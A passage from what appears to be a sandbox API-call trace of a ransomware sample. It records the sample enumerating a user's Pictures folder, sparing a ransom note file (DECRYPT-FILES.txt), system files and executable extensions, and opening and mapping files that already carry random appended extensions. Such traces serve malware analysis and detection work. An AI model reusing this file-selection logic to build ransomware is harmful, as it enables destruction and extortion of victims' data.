lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\0a16c9.tmp" [0186.078] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.079] CloseHandle (hObject=0x0) returned 0 [0186.079] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.079] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0806d00, ftCreationTime.dwHighDateTime=0x1d4d15e, ftLastAccessTime.dwLowDateTime=0xa7d8f9f0, ftLastAccessTime.dwHighDateTime=0x1d4d1ce, ftLastWriteTime.dwLowDateTime=0xafc916e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1908, dwReserved0=0x0, dwReserved1=0x0, cFileName="9MoUg27.png.E5camY", cAlternateFileName="9MOUG2~1.E5C")) returned 1 [0186.079] lstrcmpiW (lpString1="9MoUg27.png.E5camY", lpString2="DECRYPT-FILES.txt") returned -1 [0186.079] lstrcmpiW (lpString1="9MoUg27.png.E5camY", lpString2="autorun.inf") returned -1 [0186.079] lstrcmpiW (lpString1="9MoUg27.png.E5camY", lpString2="boot.ini") returned -1 [0186.079] lstrcmpiW (lpString1="9MoUg27.png.E5camY", lpString2="desktop.ini") returned -1 [0186.079] lstrcmpiW (lpString1="9MoUg27.png.E5camY", lpString2="ntuser.dat") returned -1 [0186.079] lstrcmpiW (lpString1="9MoUg27.png.E5camY", lpString2="iconcache.db") returned -1 [0186.079] lstrcmpiW (lpString1="9MoUg27.png.E5camY", lpString2="bootsect.bak") returned -1 [0186.079] lstrcmpiW (lpString1="9MoUg27.png.E5camY", lpString2="ntuser.dat.log") returned -1 [0186.079] lstrcmpiW (lpString1="9MoUg27.png.E5camY", lpString2="thumbs.db") returned -1 [0186.079] lstrcmpiW (lpString1="9MoUg27.png.E5camY", lpString2="Bootfont.bin") returned -1 [0186.079] lstrlenW (lpString="9MoUg27.png.E5camY") returned 18 [0186.079] lstrcmpiW (lpString1="E5camY", lpString2="lnk") returned -1 [0186.079] lstrcmpiW (lpString1="E5camY", lpString2="exe") returned -1 [0186.079] lstrcmpiW (lpString1="E5camY", lpString2="sys") returned -1 [0186.080] lstrcmpiW (lpString1="E5camY", lpString2="dll") returned 1 [0186.080] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.080] lstrlenW (lpString="9MoUg27.png.E5camY") returned 18 [0186.080] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="9MoUg27.png.E5camY" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\9MoUg27.png.E5camY") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\9MoUg27.png.E5camY" [0186.080] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.080] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\9MoUg27.png.E5camY" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\9moug27.png.e5camy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.080] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=6408) returned 1 [0186.080] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.080] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.081] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.081] CloseHandle (hObject=0x268) returned 1 [0186.081] CloseHandle (hObject=0x264) returned 1 [0186.081] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.081] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59c45980, ftCreationTime.dwHighDateTime=0x1d4ca58, ftLastAccessTime.dwLowDateTime=0xd670fb90, ftLastAccessTime.dwHighDateTime=0x1d4cd0b, ftLastWriteTime.dwLowDateTime=0xafd75f20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x105da, dwReserved0=0x0, dwReserved1=0x0, cFileName="AGnK5Q1b.bmp.7EM5a", cAlternateFileName="AGNK5Q~1.7EM")) returned 1 [0186.081] lstrcmpiW (lpString1="AGnK5Q1b.bmp.7EM5a", lpString2="DECRYPT-FILES.txt") returned -1 [0186.081] lstrcmpiW (lpString1="AGnK5Q1b.bmp.7EM5a", lpString2="autorun.inf") returned -1 [0186.081] lstrcmpiW (lpString1="AGnK5Q1b.bmp.7EM5a", lpString2="boot.ini") returned -1 [0186.081] lstrcmpiW (lpString1="AGnK5Q1b.bmp.7EM5a", lpString2="desktop.ini") returned -1 [0186.082] lstrcmpiW (lpString1="AGnK5Q1b.bmp.7EM5a", lpString2="ntuser.dat") returned -1 [0186.082] lstrcmpiW (lpString1="AGnK5Q1b.bmp.7EM5a", lpString2="iconcache.db") returned -1 [0186.082] lstrcmpiW (lpString1="AGnK5Q1b.bmp.7EM5a", lpString2="bootsect.bak") returned -1 [0186.082] lstrcmpiW (lpString1="AGnK5Q1b.bmp.7EM5a", lpString2="ntuser.dat.log") returned -1 [0186.082] lstrcmpiW (lpString1="AGnK5Q1b.bmp.7EM5a", lpString2="thumbs.db") returned -1 [0186.082] lstrcmpiW (lpString1="AGnK5Q1b.bmp.7EM5a", lpString2="Bootfont.bin") returned -1 [0186.082] lstrlenW (lpString="AGnK5Q1b.bmp.7EM5a") returned 18 [0186.082] lstrcmpiW (lpString1="7EM5a", lpString2="lnk") returned -1 [0186.082] lstrcmpiW (lpString1="7EM5a", lpString2="exe") returned -1 [0186.082] lstrcmpiW (lpString1="7EM5a", lpString2="sys") returned -1 [0186.082] lstrcmpiW (lpString1="7EM5a", lpString2="dll") returned -1 [0186.082] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.082] lstrlenW (lpString="AGnK5Q1b.bmp.7EM5a") returned 18 [0186.082] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.082] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="AGnK5Q1b.bmp.7EM5a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\AGnK5Q1b.bmp.7EM5a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\AGnK5Q1b.bmp.7EM5a" [0186.082] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.082] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\AGnK5Q1b.bmp.7EM5a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\agnk5q1b.bmp.7em5a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.084] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=67034) returned 1 [0186.084] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.084] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.085] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.085] CloseHandle (hObject=0x268) returned 1 [0186.085] CloseHandle (hObject=0x264) returned 1 [0186.085] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.085] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c618870, ftCreationTime.dwHighDateTime=0x1d4c8a4, ftLastAccessTime.dwLowDateTime=0x2e2812f0, ftLastAccessTime.dwHighDateTime=0x1d4ce2f, ftLastWriteTime.dwLowDateTime=0xafdc21e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x0, dwReserved1=0x0, cFileName="CjScda.jpg.RVSeEm", cAlternateFileName="CJSCDA~1.RVS")) returned 1 [0186.085] lstrcmpiW (lpString1="CjScda.jpg.RVSeEm", lpString2="DECRYPT-FILES.txt") returned -1 [0186.085] lstrcmpiW (lpString1="CjScda.jpg.RVSeEm", lpString2="autorun.inf") returned 1 [0186.085] lstrcmpiW (lpString1="CjScda.jpg.RVSeEm", lpString2="boot.ini") returned 1 [0186.085] lstrcmpiW (lpString1="CjScda.jpg.RVSeEm", lpString2="desktop.ini") returned -1 [0186.085] lstrcmpiW (lpString1="CjScda.jpg.RVSeEm", lpString2="ntuser.dat") returned -1 [0186.085] lstrcmpiW (lpString1="CjScda.jpg.RVSeEm", lpString2="iconcache.db") returned -1 [0186.085] lstrcmpiW (lpString1="CjScda.jpg.RVSeEm", lpString2="bootsect.bak") returned 1 [0186.085] lstrcmpiW (lpString1="CjScda.jpg.RVSeEm", lpString2="ntuser.dat.log") returned -1 [0186.085] lstrcmpiW (lpString1="CjScda.jpg.RVSeEm", lpString2="thumbs.db") returned -1 [0186.085] lstrcmpiW (lpString1="CjScda.jpg.RVSeEm", lpString2="Bootfont.bin") returned 1 [0186.085] lstrlenW (lpString="CjScda.jpg.RVSeEm") returned 17 [0186.085] lstrcmpiW (lpString1="RVSeEm", lpString2="lnk") returned 1 [0186.085] lstrcmpiW (lpString1="RVSeEm", lpString2="exe") returned 1 [0186.085] lstrcmpiW (lpString1="RVSeEm", lpString2="sys") returned -1 [0186.085] lstrcmpiW (lpString1="RVSeEm", lpString2="dll") returned 1 [0186.085] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.085] lstrlenW (lpString="CjScda.jpg.RVSeEm") returned 17 [0186.085] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.085] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="CjScda.jpg.RVSeEm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\CjScda.jpg.RVSeEm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\CjScda.jpg.RVSeEm" [0186.085] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\CjScda.jpg.RVSeEm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\cjscda.jpg.rvseem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.086] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=93314) returned 1 [0186.086] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.086] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.087] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.087] CloseHandle (hObject=0x268) returned 1 [0186.087] CloseHandle (hObject=0x264) returned 1 [0186.087] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.087] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab403740, ftCreationTime.dwHighDateTime=0x1d4d433, ftLastAccessTime.dwLowDateTime=0x2b91b240, ftLastAccessTime.dwHighDateTime=0x1d4c8ed, ftLastWriteTime.dwLowDateTime=0xafe0e4a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x13363, dwReserved0=0x0, dwReserved1=0x0, cFileName="cZLwBD2he.gif.YSnJCy1", cAlternateFileName="CZLWBD~1.YSN")) returned 1 [0186.087] lstrcmpiW (lpString1="cZLwBD2he.gif.YSnJCy1", lpString2="DECRYPT-FILES.txt") returned -1 [0186.087] lstrcmpiW (lpString1="cZLwBD2he.gif.YSnJCy1", lpString2="autorun.inf") returned 1 [0186.087] lstrcmpiW (lpString1="cZLwBD2he.gif.YSnJCy1", lpString2="boot.ini") returned 1 [0186.087] lstrcmpiW (lpString1="cZLwBD2he.gif.YSnJCy1", lpString2="desktop.ini") returned -1 [0186.087] lstrcmpiW (lpString1="cZLwBD2he.gif.YSnJCy1", lpString2="ntuser.dat") returned -1 [0186.087] lstrcmpiW (lpString1="cZLwBD2he.gif.YSnJCy1", lpString2="iconcache.db") returned -1 [0186.087] lstrcmpiW (lpString1="cZLwBD2he.gif.YSnJCy1", lpString2="bootsect.bak") returned 1 [0186.087] lstrcmpiW (lpString1="cZLwBD2he.gif.YSnJCy1", lpString2="ntuser.dat.log") returned -1 [0186.087] lstrcmpiW (lpString1="cZLwBD2he.gif.YSnJCy1", lpString2="thumbs.db") returned -1 [0186.087] lstrcmpiW (lpString1="cZLwBD2he.gif.YSnJCy1", lpString2="Bootfont.bin") returned 1 [0186.087] lstrlenW (lpString="cZLwBD2he.gif.YSnJCy1") returned 21 [0186.088] lstrcmpiW (lpString1="YSnJCy1", lpString2="lnk") returned 1 [0186.088] lstrcmpiW (lpString1="YSnJCy1", lpString2="exe") returned 1 [0186.088] lstrcmpiW (lpString1="YSnJCy1", lpString2="sys") returned 1 [0186.088] lstrcmpiW (lpString1="YSnJCy1", lpString2="dll") returned 1 [0186.088] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.088] lstrlenW (lpString="cZLwBD2he.gif.YSnJCy1") returned 21 [0186.088] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.088] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="cZLwBD2he.gif.YSnJCy1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\cZLwBD2he.gif.YSnJCy1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\cZLwBD2he.gif.YSnJCy1" [0186.088] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\cZLwBD2he.gif.YSnJCy1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\czlwbd2he.gif.ysnjcy1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.088] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=78691) returned 1 [0186.088] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.088] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.089] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.089] CloseHandle (hObject=0x268) returned 1 [0186.089] CloseHandle (hObject=0x264) returned 1 [0186.089] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.089] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc916e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xafc916e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xafc916e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.089] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.090] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f7a0350, ftCreationTime.dwHighDateTime=0x1d4cd70, ftLastAccessTime.dwLowDateTime=0x908fc050, ftLastAccessTime.dwHighDateTime=0x1d4c817, ftLastWriteTime.dwLowDateTime=0xafe34600, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xabde, dwReserved0=0x0, dwReserved1=0x0, cFileName="EeWqUR.gif.Lty6tVW", cAlternateFileName="EEWQUR~1.LTY")) returned 1 [0186.090] lstrcmpiW (lpString1="EeWqUR.gif.Lty6tVW", lpString2="DECRYPT-FILES.txt") returned 1 [0186.090] lstrcmpiW (lpString1="EeWqUR.gif.Lty6tVW", lpString2="autorun.inf") returned 1 [0186.090] lstrcmpiW (lpString1="EeWqUR.gif.Lty6tVW", lpString2="boot.ini") returned 1 [0186.090] lstrcmpiW (lpString1="EeWqUR.gif.Lty6tVW", lpString2="desktop.ini") returned 1 [0186.090] lstrcmpiW (lpString1="EeWqUR.gif.Lty6tVW", lpString2="ntuser.dat") returned -1 [0186.090] lstrcmpiW (lpString1="EeWqUR.gif.Lty6tVW", lpString2="iconcache.db") returned -1 [0186.090] lstrcmpiW (lpString1="EeWqUR.gif.Lty6tVW", lpString2="bootsect.bak") returned 1 [0186.090] lstrcmpiW (lpString1="EeWqUR.gif.Lty6tVW", lpString2="ntuser.dat.log") returned -1 [0186.090] lstrcmpiW (lpString1="EeWqUR.gif.Lty6tVW", lpString2="thumbs.db") returned -1 [0186.090] lstrcmpiW (lpString1="EeWqUR.gif.Lty6tVW", lpString2="Bootfont.bin") returned 1 [0186.090] lstrlenW (lpString="EeWqUR.gif.Lty6tVW") returned 18 [0186.090] lstrcmpiW (lpString1="Lty6tVW", lpString2="lnk") returned 1 [0186.090] lstrcmpiW (lpString1="Lty6tVW", lpString2="exe") returned 1 [0186.090] lstrcmpiW (lpString1="Lty6tVW", lpString2="sys") returned -1 [0186.090] lstrcmpiW (lpString1="Lty6tVW", lpString2="dll") returned 1 [0186.090] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.090] lstrlenW (lpString="EeWqUR.gif.Lty6tVW") returned 18 [0186.090] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.090] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="EeWqUR.gif.Lty6tVW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\EeWqUR.gif.Lty6tVW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\EeWqUR.gif.Lty6tVW" [0186.090] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\EeWqUR.gif.Lty6tVW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\eewqur.gif.lty6tvw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.091] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=43998) returned 1 [0186.091] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.091] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.091] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.091] CloseHandle (hObject=0x268) returned 1 [0186.091] CloseHandle (hObject=0x264) returned 1 [0186.092] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.092] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd90b97f0, ftCreationTime.dwHighDateTime=0x1d4d37f, ftLastAccessTime.dwLowDateTime=0x208acb40, ftLastAccessTime.dwHighDateTime=0x1d4d4d0, ftLastWriteTime.dwLowDateTime=0xafe808c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x12ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L48TW.bmp.Cbnr4", cAlternateFileName="L48TWB~1.CBN")) returned 1 [0186.092] lstrcmpiW (lpString1="L48TW.bmp.Cbnr4", lpString2="DECRYPT-FILES.txt") returned 1 [0186.092] lstrcmpiW (lpString1="L48TW.bmp.Cbnr4", lpString2="autorun.inf") returned 1 [0186.092] lstrcmpiW (lpString1="L48TW.bmp.Cbnr4", lpString2="boot.ini") returned 1 [0186.092] lstrcmpiW (lpString1="L48TW.bmp.Cbnr4", lpString2="desktop.ini") returned 1 [0186.092] lstrcmpiW (lpString1="L48TW.bmp.Cbnr4", lpString2="ntuser.dat") returned -1 [0186.092] lstrcmpiW (lpString1="L48TW.bmp.Cbnr4", lpString2="iconcache.db") returned 1 [0186.092] lstrcmpiW (lpString1="L48TW.bmp.Cbnr4", lpString2="bootsect.bak") returned 1 [0186.092] lstrcmpiW (lpString1="L48TW.bmp.Cbnr4", lpString2="ntuser.dat.log") returned -1 [0186.092] lstrcmpiW (lpString1="L48TW.bmp.Cbnr4", lpString2="thumbs.db") returned -1 [0186.092] lstrcmpiW (lpString1="L48TW.bmp.Cbnr4", lpString2="Bootfont.bin") returned 1 [0186.092] lstrlenW (lpString="L48TW.bmp.Cbnr4") returned 15 [0186.092] lstrcmpiW (lpString1="Cbnr4", lpString2="lnk") returned -1 [0186.092] lstrcmpiW (lpString1="Cbnr4", lpString2="exe") returned -1 [0186.092] lstrcmpiW (lpString1="Cbnr4", lpString2="sys") returned -1 [0186.092] lstrcmpiW (lpString1="Cbnr4", lpString2="dll") returned -1 [0186.092] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.092] lstrlenW (lpString="L48TW.bmp.Cbnr4") returned 15 [0186.092] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.092] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="L48TW.bmp.Cbnr4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\L48TW.bmp.Cbnr4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\L48TW.bmp.Cbnr4" [0186.092] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.093] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\L48TW.bmp.Cbnr4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\l48tw.bmp.cbnr4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.093] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=76464) returned 1 [0186.093] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.093] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.094] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.094] CloseHandle (hObject=0x268) returned 1 [0186.094] CloseHandle (hObject=0x264) returned 1 [0186.094] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.094] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38ea0b70, ftCreationTime.dwHighDateTime=0x1d4cc41, 